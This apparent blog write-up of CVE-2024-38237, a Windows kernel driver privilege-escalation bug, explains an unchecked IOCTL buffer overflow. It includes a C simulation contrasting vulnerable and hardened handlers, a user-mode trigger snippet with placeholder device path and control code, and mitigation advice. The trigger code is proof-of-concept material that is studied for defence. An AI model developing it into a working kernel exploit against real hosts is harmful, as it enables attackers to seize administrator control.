CVE-2024-38237 is an elevation of privilege vulnerability in the Kernel Streaming WOW Thunk Service Driver (henceforth referred to as the "KS-WOW Driver") that could allow a local attacker to escalate their privileges on a target system. A successful exploit yields administrator-level access, enabling the attacker to read sensitive data, disable security controls, or plant backdoors for later use.

This vulnerability affects Windows systems that ship the KS-WOW Driver (ksthunk.sys, which thunks kernel streaming requests issued by 32-bit processes on 64-bit Windows). In this post we go over the details of the exploit, how it works, and a brief code snippet illustrating how the vulnerability is triggered.

Exploit Details

When a specific IOCTL (Input/Output Control) code is sent to the KS-WOW Driver, the handler does not validate the caller-supplied input before using it, and the result is a buffer overflow in kernel memory. Because the driver trusts the size and contents of the request, a local user who can open the device can corrupt adjacent kernel data and, with the right memory layout, execute code in the kernel context. The root cause is therefore a missing input-validation check in the IOCTL handling rather than a flaw in the IOCTL interface itself; the caller needs only a handle to the device, not existing administrative rights.
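The handler pattern described above, as an added example that is not code from the original post or from Microsoft's driver: a METHOD_BUFFERED dispatch routine that copies the caller's input into a fixed-size frame without checking InputBufferLength, next to a hardened version that rejects undersized and oversized requests before touching memory. The control code, the frame layout and the guard word are hypothetical and exist only to make the corruption observable; the NTSTATUS values are the real constants. The simulation runs in user mode and caps the input at the frame size so the overflow lands on the guard word instead of crashing the process.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stand-ins for the kernel types so the example builds with any C compiler.
   The NTSTATUS values are the real ones. */
typedef int32_t NTSTATUS;
#define STATUS_SUCCESS                ((NTSTATUS)0x00000000)
#define STATUS_INVALID_DEVICE_REQUEST ((NTSTATUS)0xC0000010)
#define STATUS_INVALID_PARAMETER      ((NTSTATUS)0xC000000D)
#define STATUS_BUFFER_TOO_SMALL       ((NTSTATUS)0xC0000023)

/* Hypothetical control code, chosen for this example only. */
#define IOCTL_EXAMPLE_PROPERTY 0x800BEADCu

/* The parts of the IRP a METHOD_BUFFERED handler consults. */
typedef struct {
    uint32_t    IoControlCode;
    uint32_t    InputBufferLength;   /* caller-controlled */
    const void *SystemBuffer;        /* kernel copy of the caller's buffer */
} IoRequest;

/* Fixed-size frame the handler unpacks the request into. The guard word
   stands for whatever follows the buffer in real kernel memory. */
typedef struct {
    char     request[64];
    uint32_t guard;
} KernelFrame;

#define GUARD_VALUE 0xCAFEF00Du

/* Vulnerable pattern: copies InputBufferLength bytes with no bound check.
   Addressed through the frame's byte representation so the simulated
   overflow stays inside the frame object and hits the guard word. */
static NTSTATUS vulnerable_dispatch(const IoRequest *req, KernelFrame *frame)
{
    if (req->IoControlCode != IOCTL_EXAMPLE_PROPERTY)
        return STATUS_INVALID_DEVICE_REQUEST;
    memcpy((char *)frame, req->SystemBuffer, req->InputBufferLength);
    return STATUS_SUCCESS;
}

/* Hardened pattern: too short means the handler would read past the input,
   too long means it would write past the frame; both are rejected. */
static NTSTATUS hardened_dispatch(const IoRequest *req, KernelFrame *frame)
{
    if (req->IoControlCode != IOCTL_EXAMPLE_PROPERTY)
        return STATUS_INVALID_DEVICE_REQUEST;
    if (req->SystemBuffer == NULL || req->InputBufferLength < sizeof(uint32_t))
        return STATUS_INVALID_PARAMETER;
    if (req->InputBufferLength > sizeof(frame->request))
        return STATUS_BUFFER_TOO_SMALL;
    memcpy(frame->request, req->SystemBuffer, req->InputBufferLength);
    return STATUS_SUCCESS;
}

typedef struct {
    NTSTATUS status;
    int      guard_intact;
    uint32_t guard_after;
} Outcome;

/* Constructed input shaped like the post's trigger: 'A' padding with a
   0xDEADBEEF marker in the last four bytes. Length is capped at the frame
   size so the simulated overflow cannot leave the frame object. */
static Outcome run_request(uint32_t len, int hardened)
{
    unsigned char input[sizeof(KernelFrame)];
    KernelFrame frame;
    IoRequest req;
    Outcome out;
    uint32_t marker = 0xDEADBEEFu;

    if (len > sizeof(input)) len = sizeof(input);
    memset(input, 'A', sizeof(input));
    if (len >= sizeof(marker))
        memcpy(input + len - sizeof(marker), &marker, sizeof(marker));

    memset(&frame, 0, sizeof(frame));
    frame.guard = GUARD_VALUE;
    req.IoControlCode = IOCTL_EXAMPLE_PROPERTY;
    req.InputBufferLength = len;
    req.SystemBuffer = input;

    out.status = hardened ? hardened_dispatch(&req, &frame)
                          : vulnerable_dispatch(&req, &frame);
    out.guard_after = frame.guard;
    out.guard_intact = (frame.guard == GUARD_VALUE);
    return out;
}

int main(void)
{
    uint32_t sizes[] = { 32, 68 };
    for (size_t i = 0; i < sizeof(sizes) / sizeof(sizes[0]); i++) {
        Outcome v = run_request(sizes[i], 0), h = run_request(sizes[i], 1);
        printf("len=%u vulnerable: status=0x%08x guard=0x%08x%s\n", sizes[i],
               (unsigned)v.status, v.guard_after, v.guard_intact ? "" : " (corrupted)");
        printf("len=%u hardened:   status=0x%08x guard=0x%08x\n", sizes[i],
               (unsigned)h.status, h.guard_after);
    }
    return 0;
}
```

A 32-byte request succeeds in both handlers and leaves the guard alone; a 68-byte request succeeds in the vulnerable handler and overwrites the guard with the caller's 0xDEADBEEF marker, while the hardened handler refuses it with STATUS_BUFFER_TOO_SMALL. In a real driver the guard would be a pool header, an object pointer or a return address, which is the material an exploit turns into code execution.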

Code Snippet

The following snippet shows the user-mode side of triggering the bug. It is not the full exploit: it opens the device, fills an oversized input buffer, and sends it with the control code. The device path and control code are illustrative values rather than the driver's actual interface, and a working exploit still needs the memory layout work that turns the corruption into code execution:

#include <windows.h>
#include <stdio.h>

// Illustrative control code; the driver's real code is not reproduced here.
#define IOCTL_TRIGGER_VULNERABILITY 0x800BEADC

int main(int argc, char* argv[])
{
    HANDLE hDevice = INVALID_HANDLE_VALUE;
    DWORD dwBytesReturned = 0;
    char szInputData[1024] = {0};

    // Fill the buffer with 'A' and place a marker value in its last four bytes.
    memset(szInputData, 0x41, sizeof(szInputData) - sizeof(ULONG));
    *(PULONG)(szInputData + sizeof(szInputData) - sizeof(ULONG)) = 0xDEADBEEF;

    // Open the device. The path is illustrative; CreateFileW is used so the
    // wide-string literal compiles regardless of the UNICODE setting.
    hDevice = CreateFileW(L"\\\\.\\KS-WOW",
                          GENERIC_READ | GENERIC_WRITE,
                          0,
                          NULL,
                          OPEN_EXISTING,
                          FILE_ATTRIBUTE_NORMAL,
                          NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device: %lu\n", GetLastError());
        return -1;
    }

    // Send the oversized input buffer to the driver with no output buffer.
    if (!DeviceIoControl(hDevice,
                         IOCTL_TRIGGER_VULNERABILITY,
                         szInputData,
                         sizeof(szInputData),
                         NULL,
                         0,
                         &dwBytesReturned,
                         NULL)) {
        printf("[-] DeviceIoControl() failed: %lu\n", GetLastError());
        CloseHandle(hDevice);
        return -1;
    }

    printf("[+] Successfully triggered vulnerability\n");
    CloseHandle(hDevice);

    return 0;
}

Original References

- CVE-2024-38237 - NVD Detail
- Kernel Streaming WOW Thunk Service Driver Vulnerability Analysis and Exploitation

Mitigation

Microsoft's advisory for CVE-2024-38237 was published with the September 2024 security updates, so the first step is to install that update. Until every host is patched, the following steps reduce exposure:

1. Implement strong access controls: limit the number of users with administrative access, enforce the principle of least privilege, and restrict who can log on or run code on sensitive hosts, since this bug requires local code execution to reach the driver.
2. Keep your system up-to-date: install the latest updates and security patches provided by Microsoft, and verify that the update for this CVE is actually present on each host rather than assuming it was applied.
3. Deploy endpoint detection: alert on unexpected privilege escalation (a user process spawning a SYSTEM child, services or scheduled tasks created from non-administrative sessions), because a local kernel exploit leaves few network-visible traces for a perimeter intrusion detection system to catch.

Conclusion

CVE-2024-38237 shows how much damage an elevation of privilege vulnerability in a kernel driver can do: a single unchecked IOCTL turns any local user into an administrator. Driver developers must validate every caller-supplied length and pointer before using it, and administrators should apply patches as soon as they become available.

Timeline

Published on: 09/10/2024 17:15:27 UTC
Last modified on: 10/09/2024 01:26:27 UTC